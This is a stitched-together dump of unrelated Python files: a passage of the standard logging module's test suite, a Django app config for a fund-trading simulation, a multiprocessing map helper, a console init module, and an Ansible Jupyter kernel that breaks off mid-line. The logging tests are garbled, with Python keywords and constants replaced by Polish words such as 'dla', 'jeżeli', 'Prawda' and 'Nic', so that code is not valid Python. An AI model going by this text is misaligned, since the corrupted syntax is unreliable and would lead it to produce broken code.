13 fn = lno = msg = args = exc_info = func = sinfo = Nic extra = {'valid_key': 'some value'} result = self.logger.makeRecord(name, level, fn, lno, msg, args, exc_info, extra=extra, sinfo=sinfo) self.assertIn('valid_key', result.__dict__) def test_has_handlers(self): self.assertPrawda(self.logger.hasHandlers()) dla handler w self.logger.handlers: self.logger.removeHandler(handler) self.assertNieprawda(self.logger.hasHandlers()) def test_has_handlers_no_propagate(self): child_logger = logging.getLogger('blah.child') child_logger.propagate = Nieprawda self.assertNieprawda(child_logger.hasHandlers()) def test_is_enabled_for(self): old_disable = self.logger.manager.disable self.logger.manager.disable = 23 self.addCleanup(setattr, self.logger.manager, 'disable', old_disable) self.assertNieprawda(self.logger.isEnabledFor(22)) def test_root_logger_aliases(self): root = logging.getLogger() self.assertIs(root, logging.root) self.assertIs(root, logging.getLogger(Nic)) self.assertIs(root, logging.getLogger('')) self.assertIs(root, logging.getLogger('foo').root) self.assertIs(root, logging.getLogger('foo.bar').root) self.assertIs(root, logging.getLogger('foo').parent) self.assertIsNot(root, logging.getLogger('\0')) self.assertIsNot(root, logging.getLogger('foo.bar').parent) def test_invalid_names(self): self.assertRaises(TypeError, logging.getLogger, any) self.assertRaises(TypeError, logging.getLogger, b'foo') klasa BaseFileTest(BaseTest): "Base klasa dla handler tests that write log files" def setUp(self): BaseTest.setUp(self) fd, self.fn = tempfile.mkstemp(".log", "test_logging-2-") os.close(fd) self.rmfiles = [] def tearDown(self): dla fn w self.rmfiles: os.unlink(fn) jeżeli os.path.exists(self.fn): os.unlink(self.fn) BaseTest.tearDown(self) def assertLogFile(self, filename): "Assert a log file jest there oraz register it dla deletion" self.assertPrawda(os.path.exists(filename), msg="Log file %r does nie exist" % filename) self.rmfiles.append(filename) klasa FileHandlerTest(BaseFileTest): def test_delay(self): os.unlink(self.fn) fh = logging.FileHandler(self.fn, delay=Prawda) self.assertIsNic(fh.stream) self.assertNieprawda(os.path.exists(self.fn)) fh.handle(logging.makeLogRecord({})) self.assertIsNotNic(fh.stream) self.assertPrawda(os.path.exists(self.fn)) fh.close() klasa RotatingFileHandlerTest(BaseFileTest): def next_rec(self): zwróć logging.LogRecord('n', logging.DEBUG, 'p', 1, self.next_message(), Nic, Nic, Nic) def test_should_not_rollover(self): # If maxbytes jest zero rollover never occurs rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=0) self.assertNieprawda(rh.shouldRollover(Nic)) rh.close() def test_should_rollover(self): rh = logging.handlers.RotatingFileHandler(self.fn, maxBytes=1) self.assertPrawda(rh.shouldRollover(self.next_rec())) rh.close() def test_file_created(self): # checks that the file jest created oraz assumes it was created # by us rh = logging.handlers.RotatingFileHandler(self.fn) rh.emit(self.next_rec()) self.assertLogFile(self.fn) rh.close() def test_rollover_filenames(self): def namer(name): zwróć name + ".test" rh = logging.handlers.RotatingFileHandler( self.fn, backupCount=2, maxBytes=1) rh.namer = namer rh.emit(self.next_rec()) self.assertLogFile(self.fn) rh.emit(self.next_rec()) self.assertLogFile(namer(self.fn + ".1")) rh.emit(self.next_rec()) self.assertLogFile(namer(self.fn + ".2")) self.assertNieprawda(os.path.exists(namer(self.fn + ".3"))) rh.close() @support.requires_zlib def test_rotator(self): def namer(name): zwróć name + ".gz" def rotator(source, dest): przy open(source, "rb") jako sf: data = sf.read() compressed = zlib.compress(data, 9) przy open(dest, "wb") jako df: df.write(compressed) os.remove(source) rh = logging.handlers.RotatingFileHandler( self.fn, backupCount=2, maxBytes=1) rh.rotator = rotator rh.namer = namer m1 = self.next_rec() rh.emit(m1) self.assertLogFile(self.fn) m2 = self.next_rec() rh.emit(m2) fn = namer(self.fn + ".1") self.assertLogFile(fn) newline = os.linesep przy open(fn, "rb") jako f: compressed = f.read() data = zlib.decompress(compressed) self.assertEqual(data.decode("ascii"), m1.msg + newline) rh.emit(self.next_rec()) fn = namer(self.fn + ".2") self.assertLogFile(fn) przy open(fn, "rb") jako f: compressed = f.read() data = zlib.decompress(compressed) self.assertEqual(data.decode("ascii"), m1.msg + newline) rh.emit(self.next_rec()) fn = namer(self.fn + ".2") przy open(fn, "rb") jako f: compressed = f.read() data = zlib.decompress(compressed) self.assertEqual(data.decode("ascii"), m2.msg + newline) self.assertNieprawda(os.path.exists(namer(self.fn + ".3"))) rh.close() klasa TimedRotatingFileHandlerTest(BaseFileTest): # other test methods added below def test_rollover(self): fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S', backupCount=1) fmt = logging.Formatter('%(asctime)s %(message)s') fh.setFormatter(fmt) r1 = logging.makeLogRecord({'msg': 'testing - initial'}) fh.emit(r1) self.assertLogFile(self.fn) time.sleep(1.1) # a little over a second ... r2 = logging.makeLogRecord({'msg': 'testing - after delay'}) fh.emit(r2) fh.close() # At this point, we should have a recent rotated file which we # can test dla the existence of. However, w practice, on some # machines which run really slowly, we don't know how far back # w time to go to look dla the log file. So, we go back a fair # bit, oraz stop jako soon jako we see a rotated file. In theory this # could of course still fail, but the chances are lower. found = Nieprawda now = datetime.datetime.now() GO_BACK = 5 * 60 # seconds dla secs w range(GO_BACK): prev = now - datetime.timedelta(seconds=secs) fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S") found = os.path.exists(fn) jeżeli found: self.rmfiles.append(fn) przerwij msg = 'No rotated files found, went back %d seconds' % GO_BACK jeżeli nie found: #print additional diagnostics dn, fn = os.path.split(self.fn) files = [f dla f w os.listdir(dn) jeżeli f.startswith(fn)] print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr) print('The only matching files are: %s' % files, file=sys.stderr) dla f w files: print('Contents of %s:' % f) path = os.path.join(dn, f) przy open(path, 'r') jako tf: print(tf.read()) self.assertPrawda(found, msg=msg) def test_invalid(self): assertRaises = self.assertRaises assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler, self.fn, 'X', delay=Prawda) assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler, self.fn, 'W', delay=Prawda) assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler, self.fn, 'W7', delay=Prawda) def test_compute_rollover_daily_attime(self): currentTime = 0 atTime = datetime.time(12, 0, 0) rh = logging.handlers.TimedRotatingFileHandler( self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=Prawda, atTime=atTime) spróbuj: actual = rh.computeRollover(currentTime) self.assertEqual(actual, currentTime + 12 * 60 * 60) actual = rh.computeRollover(currentTime + 13 * 60 * 60) self.assertEqual(actual, currentTime + 36 * 60 * 60) w_końcu: rh.close() #@unittest.skipIf(Prawda, 'Temporarily skipped dopóki failures investigated.') def test_compute_rollover_weekly_attime(self): currentTime = int(time.time()) today = currentTime - currentTime % 86400 atTime = datetime.time(12, 0, 0) wday = time.gmtime(today).tm_wday dla day w range(7): rh = logging.handlers.TimedRotatingFileHandler( self.fn, when='W%d' % day, interval=1, backupCount=0, utc=Prawda, atTime=atTime) spróbuj: jeżeli wday > day: # The rollover day has already dalejed this week, so we # go over into next week expected = (7 - wday + day) inaczej: expected = (day - wday) # At this point expected jest w days z now, convert to seconds expected *= 24 * 60 * 60 # Add w the rollover time expected += 12 * 60 * 60 # Add w adjustment dla today expected += today actual = rh.computeRollover(today) jeżeli actual != expected: print('failed w timezone: %d' % time.timezone) print('local vars: %s' % locals()) self.assertEqual(actual, expected) jeżeli day == wday: # goes into following week expected += 7 * 24 * 60 * 60 actual = rh.computeRollover(today + 13 * 60 * 60) jeżeli actual != expected: print('failed w timezone: %d' % time.timezone) print('local vars: %s' % locals()) self.assertEqual(actual, expected) w_końcu: rh.close() def secs(**kw): zwróć datetime.timedelta(**kw) // datetime.timedelta(seconds=1) dla when, exp w (('S', 1), ('M', 60), ('H', 60 * 60), ('D', 60 * 60 * 24), ('MIDNIGHT', 60 * 60 * 24), # current time (epoch start) jest a Thursday, W0 means Monday ('W0', secs(days=4, hours=24)), ): def test_compute_rollover(self, when=when, exp=exp): rh = logging.handlers.TimedRotatingFileHandler( self.fn, when=when, interval=1, backupCount=0, utc=Prawda) currentTime = 0.0 actual = rh.computeRollover(currentTime) jeżeli exp != actual: # Failures occur on some systems dla MIDNIGHT oraz W0. # Print detailed calculation dla MIDNIGHT so we can try to see # what's going on jeżeli when == 'MIDNIGHT': spróbuj: jeżeli rh.utc: t = time.gmtime(currentTime) inaczej: t = time.localtime(currentTime) currentHour = t[3] currentMinute = t[4] currentSecond = t[5] # r jest the number of seconds left between now oraz midnight r = logging.handlers._MIDNIGHT - ((currentHour * 60 + currentMinute) * 60 + currentSecond) result = currentTime + r print('t: %s (%s)' % (t, rh.utc), file=sys.stderr) print('currentHour: %s' % currentHour, file=sys.stderr) print('currentMinute: %s' % currentMinute, file=sys.stderr) print('currentSecond: %s' % currentSecond, file=sys.stderr) print('r: %s' % r, file=sys.stderr) print('result: %s' % result, file=sys.stderr) wyjąwszy Exception: print('exception w diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr) self.assertEqual(exp, actual) rh.close() setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover) @unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil required dla this test.') klasa NTEventLogHandlerTest(BaseTest): def test_basic(self): logtype = 'Application' elh = win32evtlog.OpenEventLog(Nic, logtype) num_recs = win32evtlog.GetNumberOfEventLogRecords(elh) h = logging.handlers.NTEventLogHandler('test_logging') r = logging.makeLogRecord({'msg': 'Test Log Message'}) h.handle(r) h.close() # Now see jeżeli the event jest recorded self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh)) flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \ win32evtlog.EVENTLOG_SEQUENTIAL_READ found = Nieprawda GO_BACK = 100 events = win32evtlog.ReadEventLog(elh, flags, GO_BACK) dla e w events: jeżeli e.SourceName != 'test_logging': kontynuuj msg = win32evtlogutil.SafeFormatMessage(e, logtype) jeżeli msg != 'Test Log Message\r\n': kontynuuj found = Prawda przerwij msg = 'Record nie found w event log, went back %d records' % GO_BACK self.assertPrawda(found, msg=msg) # Set the locale to the platform-dependent default. I have no idea # why the test does this, but w any case we save the current locale # first oraz restore it at the end. @support.run_with_locale('LC_ALL', '') def test_main(): support.run_unittest( BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest, HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest, DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest, ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest, StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest, QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest, LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest, RotatingFileHandlerTest, LastResortTest, LogRecordTest, ExceptionTest, SysLogHandlerTest, HTTPHandlerTest, NTEventLogHandlerTest, TimedRotatingFileHandlerTest, UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest) jeżeli __name__ == "__main__": test_main()
apps.py
import os from datetime import timedelta, datetime from threading import Thread import akshare as ak from django.apps import AppConfig from timeloop import Timeloop from analysis.conf.yconfig import YConfig from analysis.core.service.fund import fetch_fund_data, init_data from analysis.core.service.pattern import get_multiple_bb_data from analysis.core.service.simulation_trade import SimulationTrade from analysis.lib.utils import get_path # 定时任务 t_loop = Timeloop() @t_loop.job(interval=timedelta(hours=1)) def sample_job_every_1h(): now = datetime.now() if 12 < now.hour < 14: init_data() SimulationTrade.init() SimulationTrade.start_multiple_simulation_trade(YConfig.get('fund:code_list')) class AnalysisConfig(AppConfig): default_auto_field = 'django.db.models.BigAutoField' name = 'analysis' # 获取基本配置 YConfig.get() fund_codes = YConfig.get('fund:code_list') SimulationTrade.init() # 创建资源目录 if os.path.exists(get_path('data/raw/')) is False: os.makedirs(get_path('data/raw/')) os.makedirs(get_path('data/html/')) # 获取基金列表-天天基金 fund_em_fund_name_df_path = get_path('data/raw/fund_em_fund_name_df.csv') if os.path.exists(fund_em_fund_name_df_path) is False: fetch_fund_data(fund_codes) if os.path.exists(get_path('data/image/')) is False: os.makedirs(get_path('data/html/simulation_trade/')) os.makedirs(get_path('data/html/bollinger_bands/')) os.makedirs(get_path('data/image/simulation_trade/')) os.makedirs(get_path('data/image/bollinger_bands/')) # 生成布林带数据 get_multiple_bb_data(fund_codes) t = Thread(target=SimulationTrade.start_multiple_simulation_trade, args=(fund_codes,)) t.start() # 启动定时任务 # t_loop.start(block=True)
parallelize.py
import multiprocessing def fun(f, q_in, q_out): """ A helper function for the parmap function. Parameters ---------- f : function Function to be evaluated using arguments in the queue q_in. q_in : multiprocessing Queue object A queue for the input arguments. q_out : multiprocessing Queue object A queue for the output of the function evaluation. """ while True: i, x = q_in.get() if i is None: break q_out.put((i, f(x))) def parmap(f, X, proc_power=1): """ A parallelized implementation of the map function. See https://www.w3schools.com/python/ref_func_map.asp . Parameters ---------- f : function Function onto which to map the input arguments in X. X : array_like The arguments to be fed to the function f. This can only handle a single argument for each evaluation of f. Returns ------- out : list A list of the outputs for each function evaluation corresponding to the input arguments in X. """ if proc_power<=1 and proc_power>0: nprocs=int(proc_power*multiprocessing.cpu_count()) else: nprocs = multiprocessing.cpu_count() q_in = multiprocessing.Queue(1) q_out = multiprocessing.Queue() proc = [multiprocessing.Process(target=fun, args=(f, q_in, q_out)) for _ in range(nprocs)] for p in proc: p.daemon = True p.start() sent = [q_in.put((i, x)) for i, x in enumerate(X)] [q_in.put((None, None)) for _ in range(nprocs)] res = [q_out.get() for _ in range(len(sent))] [p.join() for p in proc] return [x for i, x in sorted(res)]
init.py
# -*- coding: utf-8 -*- # Written by: SantaSpeen # (c) SantaSpeen 2022 import os import sys from threading import Thread from .Console import Console from .Store import Store from . import tools c: Console = None s: Store = None def start_console(): global c, s c.builtins_hook() c.logger_hook() th = Thread(target=c.run) th.start() s.threads.update({"console": {"object": th, "pid": th.native_id}}) def init_core(): if os.name == 'nt': sys.stderr.write("\nWindows OS is not available\n\n") exit(1) global c, s c = Console(prompt_out="<:") s = Store().builtins_hook() s.builtins_hook() s.start_console = start_console s.terminal_size = tools.get_terminal_size s.clear = lambda: os.system('cls' if os.name == 'nt' else 'clear') return s
kernel.py
from __future__ import print_function from ipykernel.kernelbase import Kernel from ipykernel.comm import CommManager from ipykernel.zmqshell import ZMQInteractiveShell from IPython.core.display_trap import DisplayTrap from subprocess import check_output from traitlets import Instance, Type import pkg_resources import atexit import time import os import re import yaml import threading from subprocess import Popen, STDOUT, PIPE import logging import json import traceback import tempfile import six import pprint import shutil from pprint import pformat from six.moves import queue from collections import namedtuple, defaultdict import zmq from zmq.eventloop.zmqstream import ZMQStream from .modules import modules from .module_args import module_args from .task_args import task_args from .play_args import play_args from six.moves import configparser from zmq.eventloop.ioloop import IOLoop import ansible_runner StatusMessage = namedtuple('StatusMessage', ['message']) TaskCompletionMessage = namedtuple('TaskCompletionMessage', ['task_num']) TASK_ARGS_MODULES = modules + task_args __version__ = '0.9.0' logger = logging.getLogger('ansible_kernel.kernel') version_pat = re.compile(r'version (\d+(\.\d+)+)') DEBUG = False def ensure_directory(d): if not os.path.exists(d): os.mkdir(d) class _NullDisplay(object): def __init__(self): self.exec_result = None def __call__(self, result): logger.debug("NullDisplay %s", result) self.exec_result = result NullDisplay = _NullDisplay() NullDisplayTrap = DisplayTrap(hook=NullDisplay) class Splitter(object): def __init__(self, channels): self.channels = channels def send_multipart(self, msg, *args, **kwargs): logger.debug('send_multipart %s %s %s', msg, args, kwargs) for channel in self.channels: result = channel.send_multipart(msg, *args, **kwargs) logger.debug('result %s', result) class AnsibleKernelHelpersThread(object): def __init__(self, queue): self.queue = queue self.io_loop = IOLoop(make_current=False) context = zmq.Context.instance() self.pause_socket = context.socket(zmq.REP) self.pause_socket_port = self.pause_socket.bind_to_random_port( "tcp://127.0.0.1") self.status_socket = context.socket(zmq.PULL) self.status_socket_port = self.status_socket.bind_to_random_port( "tcp://127.0.0.1") self.pause_stream = ZMQStream(self.pause_socket, self.io_loop) self.status_stream = ZMQStream(self.status_socket, self.io_loop) self.pause_stream.on_recv(self.recv_pause) self.status_stream.on_recv(self.recv_status) self.thread = threading.Thread(target=self._thread_main) self.thread.daemon = True def start(self): logger.info('thread.start') self.thread.start() atexit.register(self.stop) def stop(self): logger.info('thread.stop start') if not self.thread.is_alive(): return self.io_loop.add_callback(self.io_loop.stop) self.thread.join() logger.info('thread.stop end') def recv_status(self, msg): logger.info(msg) self.queue.put(StatusMessage(json.loads(msg[0]))) def recv_pause(self, msg): logger.info("completed %s waiting...", msg) self.queue.put(TaskCompletionMessage(json.loads(msg[0]))) def _thread_main(self): """The inner loop that's actually run in a thread""" self.io_loop.make_current() self.io_loop.start() self.io_loop.close(all_fds=True) class AnsibleKernel(Kernel): shell = Instance('IPython.core.interactiveshell.InteractiveShellABC', allow_none=True) shell_class = Type(ZMQInteractiveShell) implementation = 'ansible_kernel' implementation_version = __version__ @property def language_version(self): m = version_pat.search(self.banner) return m.group(1) _banner = None @property def banner(self): if self._banner is None: self._banner = check_output( ['ansible', '--version']).decode('utf-8') return self._banner language_info = {'name': 'ansible', 'codemirror_mode': 'yaml', 'mimetype': 'text/yaml', 'file_extension': '.yml'} help_links = [ { 'text': 'Ansible Reference', 'url': 'https://docs.ansible.com/ansible/latest/index.html' } ] def __init__(self, **kwargs): start_time = time.time() Kernel.__init__(self, **kwargs) logger.debug("session %s %s", type(self.session), self.session) logger.debug("iopub_socket %s %s", type(self.iopub_socket), self.iopub_socket) self.original_iopub_socket = self.iopub_socket self.iopub_socket = Splitter([self.original_iopub_socket, self]) self.user_ns = {} self.shell = self.shell_class.instance(parent=self, profile_dir=self.profile_dir, user_ns=self.user_ns, kernel=self) self.shell.displayhook.session = self.session self.shell.displayhook.pub_socket = self.iopub_socket self.shell.displayhook.topic = self._topic('execute_result') self.shell.display_pub.session = self.session self.shell.display_pub.pub_socket = self.iopub_socket self.comm_manager = CommManager(parent=self, kernel=self) self.shell.configurables.append(self.comm_manager) self.shell_handlers['comm_open'] = self.comm_open self.shell_handlers['comm_msg'] = self.comm_msg self.shell_handlers['comm_close'] = self.comm_close self.ansible_cfg = None self.ansible_process = None self.current_play = None self.next_task_file = None self.task_files = [] self.registered_variable = None self.playbook_file = None self.silent = False self.runner = None self.runner_thread = None self.shutdown_requested = False self.shutdown = False self.widgets = defaultdict(dict) self.widget_update_order = 0 self.vault_password = None self.default_inventory = "[all]\nlocalhost ansible_connection=local\n" self.default_play = yaml.dump(dict(hosts='localhost', name='default', gather_facts=False)) self.temp_dir = tempfile.mkdtemp(prefix="ansible_kernel_playbook") self.queue = None self.tasks_counter = 0 self.current_task = None logger.debug(self.temp_dir) ensure_directory(os.path.join(self.temp_dir, 'env')) ensure_directory(os.path.join(self.temp_dir, 'project')) self.copy_files() ensure_directory(os.path.join(self.temp_dir, 'project', 'roles')) with open(os.path.join(self.temp_dir, 'env', 'settings'), 'w') as f: f.write(json.dumps(dict(idle_timeout=0, job_timeout=0))) self.do_inventory(self.default_inventory) self.shell.run_code("import json") self.do_execute_play(self.default_play) logger.info("Kernel init finished took %s", time.time() - start_time) def copy_files(self): src = os.path.abspath('.') dest = os.path.join(self.temp_dir, 'project') src_files = os.listdir(src) for file_name in src_files: full_file_name = os.path.join(src, file_name) if (os.path.isfile(full_file_name)): shutil.copy(full_file_name, dest) if (os.path.isdir(full_file_name)): shutil.copytree(full_file_name, os.path.join(dest, file_name)) def start_helper(self): self.queue = queue.Queue() self.helper = AnsibleKernelHelpersThread(self.queue) self.helper.start() self.process_widgets() logger.info("Started helper") config = configparser.SafeConfigParser() if self.ansible_cfg is not None: config.readfp(six.StringIO(self.ansible_cfg)) if not os.path.exists(os.path.join(self.temp_dir, 'project')): os.mkdir(os.path.join(self.temp_dir, 'project')) if not config.has_section('defaults'): config.add_section('defaults') if config.has_option('defaults', 'roles_path'): roles_path = config.get('defaults', 'roles_path') roles_path = ":".join([os.path.abspath(x) for x in roles_path.split(":")]) roles_path = "{0}:{1}".format(roles_path, os.path.abspath(pkg_resources.resource_filename('ansible_kernel', 'roles'))) config.set('defaults', 'roles_path', roles_path) else: config.set('defaults', 'roles_path', os.path.abspath( pkg_resources.resource_filename('ansible_kernel', 'roles'))) logger.debug("vault_password? %s", self.vault_password and not config.has_option('defaults', 'vault_password_file')) if self.vault_password and not config.has_option('defaults', 'vault_password_file'): vault_password_file = os.path.join(self.temp_dir, 'project', 'vault-secret') with open(vault_password_file, 'w') as vpf: vpf.write(self.vault_password) config.set('defaults', 'vault_password_file', vault_password_file) if not config.has_section('callback_ansible_kernel_helper'): config.add_section('callback_ansible_kernel_helper') config.set('callback_ansible_kernel_helper', 'status_port', str(self.helper.status_socket_port)) with open(os.path.join(self.temp_dir, 'project', 'ansible.cfg'), 'w') as f: config.write(f) logger.info("Wrote ansible.cfg") def rewrite_ports(self): with open(self.playbook_file, 'r') as f: playbook = yaml.load(f.read(), Loader=yaml.FullLoader) playbook[0]['tasks'][0]['pause_for_kernel']['port'] = self.helper.pause_socket_port with open(self.playbook_file, 'w') as f: f.write(yaml.safe_dump(playbook, default_flow_style=False)) def clean_up_task_files(self, backup=False): for task_file in self.task_files: if backup: shutil.copy(task_file, task_file + ".bak") if os.path.exists(task_file): os.unlink(task_file) self.task_files = [] def runner_process_message(self, data): logger.info("runner message:\n{}".format(pprint.pformat(data))) try: event_data = data.get('event_data', {}) task = event_data.get('task') role = event_data.get('role', None) event = data.get('event') if DEBUG: stream_content = dict(name='stdout', text="{}\n".format(pprint.pformat(data))) self.send_response(self.iopub_socket, 'stream', stream_content) if event == 'playbook_on_start': pass elif event == 'playbook_on_play_start': pass elif event == 'playbook_on_stats': pass elif event == 'playbook_on_include': pass elif event == 'runner_on_start': pass elif event == 'playbook_on_task_start': logger.debug('playbook_on_task_start') task_args = event_data.get('task_args', []) task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStart', dict(task_name=task, role_name=role, task_arg=task_args, task_id=task_uuid)])) elif event == 'runner_on_ok': logger.debug('runner_on_ok') results = event_data.get('res', {}) device_name = event_data.get('host') task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, delegated_host_name=device_name, changed=results.get('changed', False), failed=False, unreachable=False, skipped=False, application_python=self._format_application_python(results), text_html=self._format_text_html(results), output=self._format_output(results), error=self._format_error(results), full_results=json.dumps(results).replace('\\', '\\\\'), results=self._dump_results(results), task_id=task_uuid)])) elif event == 'runner_on_failed': device_name = event_data.get('host') task_uuid = data.get('uuid', '') results = event_data.get('res', {}) self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, changed=False, failed=True, unreachable=False, skipped=False, delegated_host_name=device_name, application_python=self._format_application_python(results), text_html=self._format_text_html(results), output=self._format_output(results), error=self._format_error(results), full_results=json.dumps(results).replace('\\', '\\\\'), results=self._dump_results(results), task_id=task_uuid)])) elif event == 'runner_on_unreachable': device_name = event_data.get('host') task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, changed=False, failed=False, unreachable=True, skipped=False, task_id=task_uuid)])) elif event == 'error': self.queue.put(StatusMessage(['Error', dict(stdout=data.get('stdout', ''))])) else: stream_content = dict(name='stdout', text="{}\n".format(pprint.pformat(data))) self.send_response(self.iopub_socket, 'stream', stream_content) except BaseException: logger.error(traceback.format_exc()) def process_message(self, message): logger.info("message %s", message) stop_processing = False message_type = message[0] message_data = message[1] logger.info("message_type %s", message_type) logger.info("message_data %s", message_data) if message_data.get('task_name', '') == 'pause_for_kernel': logger.debug('pause_for_kernel') return stop_processing if message_data.get('task_name', '') == 'include_variables': return stop_processing if message_data.get('task_name', '') == 'include_vars': return stop_processing if message_data.get('task_name', '') == 'include_tasks': logger.debug('include_tasks') if message_type == 'TaskStatus' and message_data.get('failed', False): logger.debug('failed') output = 'fatal: [%s]: FAILED!' % message_data['device_name'] if message_data.get('results', None): output += " => " output += message_data['results'] output += "\n" stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) return stop_processing output = '' if message_type == 'TaskStart': logger.debug('TaskStart') task_name = message_data['task_name'] if message_data.get('role_name'): task_name = "%s : %s" % (message_data['role_name'], task_name) output = 'TASK [%s] %s\n' % (task_name, '*' * (72 - len(task_name))) elif message_type == 'DeviceStatus': logger.debug('DeviceStatus') pass elif message_type == 'PlaybookEnded': logger.debug('PlaybookEnded') output = "\nPlaybook ended\nContext lost!\n" self.do_shutdown(False) self.clean_up_task_files(True) self.start_helper() self.rewrite_ports() self.start_ansible_playbook() stop_processing = True elif message_type == 'TaskStatus': logger.debug('TaskStatus') if message_data.get('changed', False): logger.debug('changed') output = 'changed: [%s]' % message_data['device_name'] elif message_data.get('unreachable', False): logger.debug('unreachable') output = 'fatal: [%s]: UNREACHABLE!' % message_data['device_name'] elif message_data.get('failed', False): logger.debug('failed') output = 'fatal: [%s]: FAILED!' % message_data['device_name'] else: logger.debug('ok') output = 'ok: [%s]' % message_data['device_name'] if message_data.get('full_results', None) and self.registered_variable is not None: logger.debug('full_results %s', type(message_data.get('full_results'))) line1 = "import json" line2 = "{0} = globals().get('{0}', dict())".format(self.registered_variable) line3 = "{0}['{2}'] = json.loads('{1}')".format(self.registered_variable, message_data.get('full_results'), message_data['device_name']) for line in [line1, line2, line3]: logger.debug(line) self.shell.run_cell(line) if message_data.get('results', None): output += " => " output += message_data['results'] if message_data.get('output', None): output += "\n\n[%s] stdout:\n" % message_data['device_name'] output += message_data['output'] if message_data.get('error', None): output += "\n\n[%s] stderr:\n" % message_data['device_name'] output += message_data['error'] if message_data.get('application_python', None): self.shell.run_cell(message_data.get('application_python')) if message_data.get('text_html', None): self.send_response(self.iopub_socket, 'display_data', dict(source="", data={"text/html": message_data.get('text_html')})) output += "\n" elif message_type == 'Error': logger.debug('Error') output = message_data.get('stdout') else: output = str(message) logger.info("output %s", output) if not self.silent: # Send standard output logger.info("sending output") stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) else: logger.info("silent") logger.info("stop_processing %s", stop_processing) return stop_processing def do_execute(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False): self.silent = silent if not code.strip(): return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} logger.debug('code %r', code) try: if code.strip().startswith("#inventory"): return self.do_inventory(code) elif code.strip().startswith("#ansible.cfg"): return self.do_ansible_cfg(code) elif code.strip().startswith("#host_vars"): return self.do_host_vars(code) elif code.strip().startswith("#group_vars"): return self.do_group_vars(code) elif code.strip().startswith("#vars"): return self.do_vars(code) elif code.strip().startswith("#template"): return self.do_template(code) elif code.strip().startswith("#task"): return self.do_execute_task(code) elif code.strip().startswith("#play"): return self.do_execute_play(code) elif code.strip().startswith("#python"): return self.do_execute_python(code) elif code.strip().startswith("#vault_password"): return self.do_execute_vault_password(code) else: return self.do_execute_task(code) except BaseException as e: logger.error(traceback.format_exc()) reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': traceback.format_exc().splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def send_traceback(self, e, limit=None): reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': traceback.format_exc(limit).splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def send_error(self, e, limit=None): reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': str(e).splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def do_inventory(self, code): logger.info("inventory set to %s", code) with open(os.path.join(self.temp_dir, 'inventory'), 'w') as f: f.write("\n".join(code.splitlines()[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_ansible_cfg(self, code): self.ansible_cfg = str(code) # Test that the code for ansible.cfg is parsable. Do not write the file yet. try: config = configparser.SafeConfigParser() if self.ansible_cfg is not None: config.readfp(six.StringIO(self.ansible_cfg)) except configparser.ParsingError as e: return self.send_error(e, 0) logger.info("ansible.cfg set to %s", code) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_host_vars(self, code): code_lines = code.strip().splitlines(True) host = code_lines[0][len('#host_vars'):].strip() logger.debug("host %s", host) host_vars = os.path.join(self.temp_dir, 'project', 'host_vars') if not os.path.exists(host_vars): os.mkdir(host_vars) with open(os.path.join(host_vars, host), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_vars(self, code): code_lines = code.strip().splitlines(True) vars = code_lines[0][len('#vars'):].strip() logger.debug("vars %s", vars) with open(os.path.join(self.temp_dir, 'project', vars), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_template(self, code): code_lines = code.strip().splitlines(True) template = code_lines[0][len('#template'):].strip() logger.debug("template %s", template) with open(os.path.join(self.temp_dir, 'project', template), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_group_vars(self, code): code_lines = code.strip().splitlines(True) group = code_lines[0][len('#group_vars'):].strip() logger.debug("group %s", group) group_vars = os.path.join(self.temp_dir, 'project', 'group_vars') if not os.path.exists(group_vars): os.mkdir(group_vars) with 